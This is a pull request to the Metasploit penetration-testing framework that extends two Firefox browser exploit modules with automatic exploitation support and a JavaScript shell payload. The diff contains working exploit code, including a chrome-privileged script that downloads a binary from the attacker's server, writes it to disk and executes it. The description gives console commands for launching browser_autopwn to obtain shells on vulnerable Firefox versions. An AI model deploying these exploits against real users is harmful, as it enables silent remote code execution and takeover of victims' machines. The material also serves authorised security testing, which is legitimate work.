### PR TITLE
Add js payload to firefox_svg_plugin, add BrowserAutopwn support to both FF JS exploits

### DIFF
--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -9,7 +9,16 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::BrowserAutopwn
   include Msf::Exploit::Remote::FirefoxAddonGenerator
+
+  autopwn_info({
+    :ua_name    => HttpClients::FF,
+    :ua_minver  => "5.0",
+    :ua_maxver  => "15.0.1",
+    :javascript => true,
+    :rank       => NormalRanking
+  })
 
   def initialize(info = {})
     super(update_info(info,

--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -8,8 +8,17 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::BrowserAutopwn
+
+  autopwn_info({
+    :ua_name    => HttpClients::FF,
+    :ua_minver  => "17.0",
+    :ua_maxver  => "17.0.1",
+    :javascript => true,
+    :rank       => NormalRanking
+  })
 
   def initialize(info = {})
     super(update_info(info,
@@ -34,10 +43,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => %w{ linux osx win },
       'Targets'        =>
         [
-          [ 'Automatic',
+          [ 'Universal (Javascript XPCOM Shell)',
             {
-              'Platform' => %w{ linux osx win },
-              'Arch'     => ARCH_X86
+              'Platform' => 'firefox',
+              'Arch' => ARCH_FIREFOX
             }
           ],
           [ 'Windows x86 (Native Payload)',
@@ -75,7 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
           ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
         ],
-      'DisclosureDate' => 'Jan 08 2013'
+      'DisclosureDate' => 'Jan 08 2013',
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => /17\..*/
+      }
     ))
 
     register_options(
@@ -108,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
       # send initial HTML page
       print_status("Target selected: #{target.name}")
       print_status("Sending #{self.name}")
-      send_response_html(cli, generate_html(target))
+      send_response_html(cli, generate_html(cli, target))
     end
     handler(cli)
   end
@@ -172,34 +186,38 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   # @return [String] containing javascript code to execute with chrome privileges
-  def js_payload(target)
-    %Q|
-    #{js_debug("Injection successful. JS executing with chrome privileges.")}
-    var x = new XMLHttpRequest;
-    x.overrideMimeType('text/plain; charset=x-user-defined');
-    x.open('POST', '#{base_url}.bin', false);
-    x.send(null);
-    #{js_debug("'Payload: '+x.responseText", "")}
-    var file = Components.classes["@mozilla.org/file/directory_service;1"]
-      .getService(Components.interfaces.nsIProperties)
-      .get("TmpD", Components.interfaces.nsIFile);
-    file.append('#{payload_filename(target)}');
-    var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
-      .createInstance(Components.interfaces.nsIFileOutputStream);
-    stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
-    stream.write(x.responseText, x.responseText.length);
-    if (stream instanceof Components.interfaces.nsISafeOutputStream) {
-      stream.finish();
-    } else {
-      stream.close();
-    }
-    #{chmod_code(target)}
-    #{js_debug("'Downloaded to: '+file.path", "")}
-    var process = Components.classes["@mozilla.org/process/util;1"]
-      .createInstance(Components.interfaces.nsIProcess);
-    process.init(file);
-    process.run(false, [], 0);
-    |
+  def js_payload(cli, target)
+    if self.target.name =~ /Javascript/
+      regenerate_payload(cli).encoded
+    else
+      %Q|
+      #{js_debug("Injection successful. JS executing with chrome privileges.")}
+      var x = new XMLHttpRequest;
+      x.overrideMimeType('text/plain; charset=x-user-defined');
+      x.open('POST', '#{base_url}.bin', false);
+      x.send(null);
+      #{js_debug("'Payload: '+x.responseText", "")}
+      var file = Components.classes["@mozilla.org/file/directory_service;1"]
+        .getService(Components.interfaces.nsIProperties)
+        .get("TmpD", Components.interfaces.nsIFile);
+      file.append('#{payload_filename(target)}');
+      var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+        .createInstance(Components.interfaces.nsIFileOutputStream);
+      stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
+      stream.write(x.responseText, x.responseText.length);
+      if (stream instanceof Components.interfaces.nsISafeOutputStream) {
+        stream.finish();
+      } else {
+        stream.close();
+      }
+      #{chmod_code(target)}
+      #{js_debug("'Downloaded to: '+file.path", "")}
+      var process = Components.classes["@mozilla.org/process/util;1"]
+        .createInstance(Components.interfaces.nsIProcess);
+      process.init(file);
+      process.run(false, [], 0);
+      |
+    end
   end
 
   # @return [String] containing javascript that will alert a debug string
@@ -228,11 +246,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   # @return [String] HTML that is sent in the first response to the client
-  def generate_html(target)
+  def generate_html(cli, target)
     vars = {
       :symbol_id        => 'a',
       :random_domain    => 'safe',
-      :payload          => js_payload(target),
+      :payload          => js_payload(cli, target),
       :payload_var      => 'c',
       :payload_key      => 'k',
       :payload_obj_var  => 'payload_obj',

--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Post
           } else {
             setTimeout(function(){
               try {
-                send(hiddenWindow.Function('send', src)(send));
+                send(hiddenWindow.wrappedJSObject.Function('send', src)(send));
               } catch (e) {
                 send("Error: "+e.message);
               }


### PR DESCRIPTION
By defaulting to the JS shell, the firefox js exploits can now work well with autopwn.

```
msf> use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set MATCH firefox
msf auxiliary(browser_autopwn) > set LHOST 0.0.0.0
msf auxiliary(browser_autopwn) > run
```
- [x] You should get a working shell from a firefox 5.*-15.0.1 instance
- [x] You should be able to run `post/firefox/gather/xss` module against this session (default opts are fine)
- [x] You should get a working shell from a firefox 17.\* instance
- [x] You should be able to run `post/firefox/gather/xss` module against this session (default opts are fine)
